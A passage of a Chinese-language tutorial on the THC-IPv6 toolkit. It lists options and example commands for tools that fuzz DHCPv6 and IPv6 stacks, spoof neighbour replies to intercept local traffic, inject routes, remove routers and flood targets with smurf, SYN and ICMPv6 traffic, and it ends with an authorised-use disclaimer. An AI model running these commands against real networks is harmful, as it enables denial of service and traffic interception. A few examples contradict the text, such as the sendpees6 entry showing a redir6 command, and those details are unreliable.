-A fuzz DHCPv6 重新配置
-B fuzz DHCPv6 信息请求
-C fuzz DHCPv6 中继转发
-D fuzz DHCPv6 中继回复
-m 也对消息类型进行模糊处理
-v ipv6 受害者的 IPv6 地址(如果未指定,则发送消息的 DHCP 客户端会受到攻击)
-x xid 受害者的事务 ID - 零表示随机(如果未指定 -v,则忽略)
-c client 受害者的客户端 ID - 零表示随机(如果未指定 -v,则忽略)
-f mac 欺骗 mac 地址
-l link 欺骗链接地址
-o options 要发送的 DHCPv6 消息选项(默认值:abcdefghijklmonpqr):
a OPTION_SERVERID
b OPTION_IA_NA
c OPTION_IA_TA
d OPTION_IAADR
e OPTION_ORO
f OPTION_PREFERENCE
g OPTION_ELAPSED_TIME
h OPTION_RELAY_MSG
i OPTION_AUTH
j OPTION_UNICAST
k OPTION_STATUS_CODE
l OPTION_RAPID_COMMIT
m OPTION_USER_CLASS
n OPTION_VENDOR_CLASS
o OPTION_VENDOR_OPTS
p OPTION_INTERFACE_ID
q OPTION_RECONF_MSG
r OPTION_RECONF_ACCEPT
bash
atk6-fuzz_dhcpc6 -1 -f 00:11:22:33:44:55 -l example.com -v fe80::20c:29ff:fef4:8e14 -x 0 -c 0 -o a eth0
47. atk6-fuzz_dhcps6
将 DHCPv6 数据包模糊化到服务器。您只能定义 -0 ... -4 类型之一,默认为 -1。如果出现错误,则返回 -1;如果测试完成且目标活动,则返回 0;如果目标崩溃,则返回 1。
bash
atk6-fuzz_dhcps6 -h
选项
-1 fuzz DHCPv6 请求(默认)
-2 fuzz DHCPv6 请求
-3 fuzz DHCPv6 确认
-4 fuzz DHCPv6 续订
-5 fuzz DHCPv6 重新绑定
-6 fuzz DHCPv6 释放
-7 fuzz DHCPv6 拒绝
-8 fuzz DHCPv6 信息请求
47.1 -m
模糊消息类型
bash
atk6-fuzz_dhcps6 -m 1 eth0
47.2 -t number
从测试号码继续
bash
atk6-fuzz_dhcps6 -m -t 10 2 eth0
47.3 -e number
从测试号码继续
bash
atk6-fuzz_dhcps6 -e 5 3 eth0
47.4 -T number
仅执行测试号码数字
bash
atk6-fuzz_dhcps6 -T 8 4 eth0
47.5 -n number
每个数据包发送次数(默认值:1)
bash
atk6-fuzz_dhcps6 -n 10 5 eth0
47.6 -f
欺骗 mac
bash
atk6-fuzz_dhcps6 -f 6 eth0
47.7 -F
欺骗链接地址
bash
atk6-fuzz_dhcps6 -F 7 eth0
47.8 -w sec
数据包之间等待的秒数(默认值:0)
bash
atk6-fuzz_dhcps6 -w 10 8 eth0
47.9 -p number
每进行一次测试就执行一次活动检查(默认值:无)
bash
atk6-fuzz_dhcps6 -p 10 8 eth0
47.10 -d
使用 -d 强制 DNS 更新,您可以在命令行上指定域名。
bash
atk6-fuzz_dhcps6 -d 1 eth0
48. atk6-fuzz_ip6
使用可选 EH 和上层传输对 IPv6 数据包进行模糊测试
bash
atk6-fuzz_ip6 -h
您只能定义 -0 ... -9、-P 和 -s 中的一个,默认为 -1。
请注意,-P 模糊测试目标应为 ff02::d。如果发生错误则返回 -1,如果测试完成且目标处于活动状态则返回 0,如果目标崩溃则返回 1。
选项
-X 不添加任何 ICMP/TCP 标头(传输层)
-1 模糊 ICMP6 回显请求(默认)
-2 模糊 ICMP6 邻居请求
-3 模糊 ICMP6 邻居通告
-4 模糊 ICMP6 路由器通告
-5 模糊多播侦听器报告数据包
-6 模糊多播侦听器完成数据包
-7 模糊多播侦听器查询数据包
-8 模糊多播侦听器 v2 报告数据包
-9 模糊多播侦听器 v2 查询数据包
-0 模糊节点查询数据包
48.1 -s port
模糊 TCP-SYN 数据包端口
bash
atk6-fuzz_ip6 -s -X eth0 fe80::20c:29ff:fef4:8e14
48.2 -P type
fuzz PIMv2 类型数据包(hello、bootstrap、assert)
bash
atk6-fuzz_ip6 -P hello eth0 fe80::20c:29ff:fef4:8e14
48.3 -x
尝试所有 256 个标志和字节类型的值
bash
atk6-fuzz_ip6 -x eth0 fe80::20c:29ff:fef4:8e14
48.4 -t number
从测试编号继续
bash
atk6-fuzz_ip6 -x -2 eth0 fe80::20c:29ff:fef4:8e14
48.5 -T number
仅执行测试编号数字
bash
atk6-fuzz_ip6 -t 3 -3 eth0 fe80::20c:29ff:fef4:8e14
48.6 -p number
每进行一次测试(默认:无)执行一次活动检查
bash
atk6-fuzz_ip6 -p 4 -4 eth0 fe80::20c:29ff:fef4:8e14
48.7 -a
不执行初始和最终活动测试
bash
atk6-fuzz_ip6 -a -5 eth0 fe80::20c:29ff:fef4:8e14
48.8 -n number
发送每个数据包的次数(默认:1)
bash
atk6-fuzz_ip6 -n 6 -6 eth0 fe80::20c:29ff:fef4:8e14
48.9 -I
也模糊 IP 标头
bash
atk6-fuzz_ip6 -l -7 eth0 fe80::20c:29ff:fef4:8e14
48.10 -F
添加一次性碎片,并对其进行模糊测试(对于 1)
bash
atk6-fuzz_ip6 -F -8 eth0 fe80::20c:29ff:fef4:8e14
48.11 -S
添加源路由,并对其进行模糊测试(对于 1)
bash
atk6-fuzz_ip6 -S -9 eth0 fe80::20c:29ff:fef4:8e14
48.12 -D
添加目标标头,并对其进行模糊测试(对于 1)
bash
atk6-fuzz_ip6 -D -0 eth0 fe80::20c:29ff:fef4:8e14
48.13 -H
添加逐跳标头,并对其进行模糊测试(对于 1 和 5-9)
bash
atk6-fuzz_ip6 -H -1 eth0 fe80::20c:29ff:fef4:8e14
48.14 -R
添加路由器警报标头,并对其进行模糊测试(对于 5-9 和所有)
bash
atk6-fuzz_ip6 -R -2 eth0 fe80::20c:29ff:fef4:8e14
48.15 -J
添加巨型数据包标头,并对其进行模糊测试(对于 1)
bash
atk6-fuzz_ip6 -J -3 eth0 fe80::20c:29ff:fef4:8e14
49. atk6-implementation6
执行一些 IPv6 实施检查,也可用于测试一些防火墙功能。大约需要 2 分钟才能完成。
bash
atk6-implementation6 -h
49.1 -s sourceip6
使用指定的源 IPv6 地址
49.2 -p
不在开始和结束时执行活动检查
bash
atk6-implementation6 -p -s fe80::2 eth0 fe80::20c:29ff:fef4:8e14
50. atk6-implementation6d
通过 implementation6 工具识别测试数据包,有助于检查哪些数据包通过了防火墙
bash
atk6-implementation6d -h
bash
atk6-implementation6d eth0
51. atk6-inject_alive6
此工具响应 PPPoE 和 6in4 隧道上的保持活动请求;对于 PPPoE 它还会发送保持活动请求。请注意,必须设置适当的环境变量 THC_IPV6_{PPPOE|6IN4}
bash
atk6-inject_alive6 -h
选项 -a 将每 15 秒主动发送活动请求。
选项 -p 将不会发送对活动请求的回复。
bash
atk6-inject_alive6 -ap eth0
52. atk6-inverse_lookup6
执行反向地址查询,以获取分配给 MAC 地址的 IPv6 地址。请注意,目前只有少数系统支持此功能。
bash
atk6-inverse_lookup6 -h
bash
atk6-inverse_lookup6 eth0 00:11:22:33:44:55
53. atk6-kill_router6
宣布目标路由器即将关闭,并将其从路由表中删除。
如果您提供"*"作为路由器地址,此工具将嗅探网络中是否存在RA 数据包并立即发送终止数据包。
bash
atk6-kill_router6 -h
选项 -H 添加逐跳、-F 分段标头和 -D dst 标头。
bash
atk6-kill_router6 -HFD eth0 fe80::20c:29ff:fef4:8e14
54. atk6-ndpexhaust26
使用 ICMPv6 TooBig 错误淹没目标 /64 网络消息。此工具版本比 ndpexhaust6 有效很多倍。
bash
atk6-ndpexhaust26 -h
-a 添加带有路由器警报的逐跳标头
-c 不计算校验和以节省时间
-p 发送 ICMPv6 回显请求
-P 发送 ICMPv6 回显回复
-T 发送 ICMPv6 生存时间已结束
-U 发送 ICMPv6 不可达(无路由)
-r 从 /64 前缀随机化源
-R 完全随机化源
-m 生成最大大小的数据包
-s sourceip6 将此用作源 IPv6 地址
bash
atk6-ndpexhaust26 -acpPTUrRm -s fe80::1 eth0 fe80::20c:29ff:fef4:8e14
55. atk6-ndpexhaust6
随机 ping 目标网络中的 IP。请注意:ndpexhaust6 已弃用,请使用 ndpexhaust26!
bash
atk6-ndpexhaust6 -h
bash
atk6-ndpexhaust6 eth0 ff80::01/16
56. atk6-node_query6
向目标发送 ICMPv6 节点查询请求并转储回复。
bash
atk6-node_query6 -h
bash
atk6-node_query6 eth0 fe80::20c:29ff:fef4:8e14
57. atk6-parasite6
这是 IPv6 的"ARP 欺骗器",通过对邻居请求做出错误回答,将所有本地流量重定向到您自己的系统(如果不存在 fake-mac,则为涅槃)
bash
atk6-parasite6 -h
选项 -l 循环并每 5 秒重新发送每个目标的数据包。
选项 -R 还将尝试注入请求的目的地
NS 安全绕过:-F 片段、-H 逐跳和 -D 大目标标头
bash
atk6-parasite6 -lRFHD eth0
58. atk6-passive_discovery6
被动嗅探网络并转储检测到的所有客户端 IPv6 地址。
请注意,在交换环境中,如果另外启动 parasite6,则可以获得更好的结果,但这会影响网络。如果在接口后指定了脚本名称,则将以检测到的 ipv6 地址作为第一个选项、以接口作为第二个选项来调用该脚本。
bash
atk6-passive_discovery6 -h
-D 也转储目标地址(不适用于 -m)
-s 仅打印地址,不输出其他内容
-m maxhop 转储目标可能离开的最大跳数。0 表示仅限本地,有意义的最大数量通常为 5
-R prefix 将定义的前缀与链接本地前缀交换
bash
atk6-passive_discovery6 -Ds -R fe80 eth0
atk6-passive_discovery6 -m 5 -R fe80 eth0
59. atk6-randicmp6
将所有 ICMPv6 类型和代码组合发送到目标。
bash
atk6-randicmp6 -h
选项 -s 设置源 IPv6 地址。
选项 -p 不会打印收到的答案。
bash
atk6-randicmp6 -p -s fe80 eth0 fe80::20c:29ff:fef4:8e14
60. atk6-redir6
将路由植入 victim-ip,将所有流量重定向到 target-ip 到new-ip。您必须知道处理路由的路由器。如果 new-router-mac 不存在,则会导致 DOS。如果目标的 TTL 不是 64,则指定这是最后一个选项。
bash
atk6-redir6 -h
bash
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4
61. atk6-redirsniff6
在 victim-ip 中植入路由,将所有到 destination-ip 的流量重定向到 new-router。所有经过的、与 victim->target 匹配的流量都会执行此操作。您必须知道处理该路由的路由器。
如果 new-router/-mac 不存在,则会导致 DOS。您可以为 victim-ip 和/或 destination-ip 提供通配符 ('*')。
bash
atk6-redirsniff6 -h
bash
atk6-redirsniff6 eth0 fe80::1 fe80::2 fe80::3 fe80::4
62. atk6-rsmurf6
对受害者的本地网络进行 Smurf 攻击。注意:这取决于实现错误,目前仅在 Linux 上验证。
Evil:"ff02::1"作为受害者将完全对您的本地 LAN 进行 DOS 攻击
bash
atk6-rsmurf6 -h
bash
atk6-rsmurf6 eth0 fe80::20c:29ff:fef4:8e14
63. atk6-sendpees6
发送 SEND 邻居请求消息并使目标验证大量 CGA 和 RSA 签名
bash
atk6-sendpees6 -h
bash
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4
64. atk6-sendpeesmp6
发送 SEND 邻居请求消息,并使目标验证大量 CGA 和 RSA 签名
原始 sendpees 由 willdamn <willdamn@gmail.com> 编写
修改后的 sendpeesMP 由 Marcin Pohl <marcinpohl@gmail.com> 基于 thc-ipv6 的代码编写
bash
atk6-sendpeesmp6 -h
bash
atk6-sendpeesmp6 eth0 2048 fe80:: fe80::1
65. atk6-smurf6
使用 icmp echo 回复对目标进行 Smurf。如果未指定,则 echo 请求的目标是本地所有节点多播地址
bash
atk6-smurf6 -h
bash
atk6-smurf6 -i 1000 eth0 fe80::20c:29ff:fef4:8e14
66. atk6-thcping6
使用特殊 IPv6 或 EH 标头选项制作 ICMPv6/TCP/UDP 数据包。
如果出现错误或没有回复,则返回 -1;如果回复正常,则返回 0;如果回复错误,则返回 1。
bash
atk6-thcping6 -h
66.1 -x
泛洪模式(不检查回复)
bash
atk6-thcping6 -x eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.2 -w ms
数据包之间的等待时间(以毫秒为单位)(默认值:1000,如果 -n 不为 1)
bash
atk6-thcping6 -w 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.3 -a
添加带有路由器警报选项的逐跳标头。
66.4 -q
添加带有快速启动选项的逐跳标头。
66.5 -E
以 ethertype IPv4 发送
66.6 -e
ethertype 以指定的 ethertype 发送(十六进制!)
66.7 -H t:l:v
添加带有特殊内容的逐跳标头
66.8 -D t:l:v
添加带有特殊内容的目标标头
66.9 -D "xxx"
添加大型目标标头,用于对数据包进行分段
bash
atk6-thcping6 -Eaq -e 0x86DD -H 1:2:0eab -D 1:2:0eab eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.10 -f
添加一次性分段标头
66.11 -F ipv6address
使用源路由到此最终目标
66.12 -t ttl
指定 TTL(默认值:255)
66.13 -c class
指定类(0-4095)
66.14 -l label
指定标签(0-1048575)
bash
atk6-thcping6 -f -F fe80::3 -t 255 -c 2048 -l 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.15 -L length
设置伪造的有效负载长度(0-65535)
66.16 -N nextheader
设置伪造的下一个标头(0-255)
66.17 -V version
设置 IP 版本(0-15)
66.18 -d data_size
定义 ping 数据缓冲区的大小
bash
atk6-thcping6 -L 2048 -N 128 -V 8 -d 100 eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.19 -O
发送 TCP Fast Open cookie 请求选项(需要 -S)
66.20 -T number
ICMPv6发送类型(默认值:128 = ping)
bash
atk6-thcping6 -T 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.21 -C number
发送 ICMPv6 代码数(默认值:0)
66.22 -S port
在定义的端口上使用 TCP SYN 数据包,而不是 ping
bash
atk6-thcping6 -O -S 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14
66.23 -U port
在定义的端口上使用 UDP 数据包,而不是 ping
66.24 -n count
发送数据包的频率(默认值:1)
bash
atk6-thcping6 -U 80 -n 1 eth0 fe80:: fe80::20c:29ff:fef4:8e14
t:l:v 语法:类型:长度:值,值为十六进制,例如 1:2:0eab。您可以将"x"放入 src6、srcmac 和 dstmac 中以获取自动值。
67. atk6-thcsyn6
用 TCP-SYN 数据包淹没目标端口。如果您提供"x"作为端口,则它是随机的。
bash
atk6-thcsyn6 -h
-i 发送数据包间隔(以微秒为单位)
-a 添加带有路由器警报的逐跳标头
-d 添加目标标头(最多可设置 64 次)
-f 添加原子碎片标头(最多可设置 64 次)
-A 发送 TCP-ACK 数据包
-S 发送 TCP-SYN-ACK 数据包
-r 从 /64 前缀随机化源
-R 完全随机化源
-D 随机化目标(视为 /64)
-O 添加 TCP Fast Open cookie (仅 SYN 数据包)
-m dstmac 使用此目标 mac 地址
-s sourceip6 使用此地址作为源 IPv6 地址
-p port 使用固定源端口
bash
atk6-thcsyn6 -aAcdDfrORS -i 2000 -m 00:11:22:33:44:55 -p 80 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 8080
68. atk6-toobig6
在目标上植入指定的 mtu。如果目标的 TTL 不是 64,则将其指定为最后一个选项。
bash
atk6-toobig6 -h
选项 -u 将发送 TooBig,而无需从现有 ip 发送欺骗性的 ping6。
bash
atk6-toobig6 -u eth0 fe80::1 fe80::2 1400
69. atk6-toobigsniff6
嗅探来自目标的数据包,并根据指定 MTU 的数据包发送 ICMPv6 过大错误消息。如果您提供 '*' 作为地址,则将使用任何全局流量嗅探。
bash
atk6-toobigsniff6 -h
如果您提供选项 -c,该工具不会在第一个数据包匹配时退出,而是继续运行并发送数据包,直到中止。
bash
atk6-toobigsniff6 -c eth0 fe80::1 fe80::2 1400
70. atk6-trace6
一个基本但非常快速的 traceroute6 程序。
bash
atk6-trace6 -h
如果未指定端口,则使用 ICMP6 Ping 请求,否则将 TCP SYN数据包发送到指定端口。选项 D、E 和 F 可以多次使用。
70.1 -a
插入带有路由器警报选项的逐跳标头。
bash
atk6-trace6 -a -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 80
70.2 -D
插入目标扩展标头
bash
atk6-trace6 -D eth0 fe80::20c:29ff:fef4:8e14 80
70.3 -E
插入带有无效选项的目标扩展标头
bash
atk6-trace6 -E eth0 fe80::20c:29ff:fef4:8e14 80
70.4 -F
插入一次性碎片标头
bash
atk6-trace6 -F eth0 fe80::20c:29ff:fef4:8e14 80
70.5 -b
不要使用 ICMP6 Ping,而是使用 TooBig(您将看不到目标)
bash
atk6-trace6 -b eth0 fe80::20c:29ff:fef4:8e14 80
70.6 -B
不要使用 ICMP6 Ping,而是使用 PingReply(您将看不到目标)
bash
atk6-trace6 -B eth0 fe80::20c:29ff:fef4:8e14
70.7 -d
将 IPv6 地址解析为 DNS。
70.8 -t
启用隧道检测
70.9 -u
如果提供了端口,则使用 UDP 而不是 TCP
bash
atk6-trace6 -dtu eth0 fe80::20c:29ff:fef4:8e14 80
70.10 -r
原始模式(适用于没有以太网的适配器网络)
bash
atk6-trace6 -r eth0 fe80::20c:29ff:fef4:8e14
70.11 -s src6
指定源 IPv6 地址
最大跳数范围:31
bash
atk6-trace6 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14
总结
THC-IPv6工具提供强大的网络渗透测试功能,通过多种模块实现IPv6环境中的漏洞利用和安全测试,是研究协议实现和检测网络漏洞的实用工具。
在此特别强调,本教程仅在合法授权的情况下进行测试和研究,请勿用于其他用途。未经授权使用此类工具可能会侵犯他人隐私,触犯相关法律,任何因此引发的法律或利益纠纷与本人无关。
欢迎各位大佬,小白来找我交流。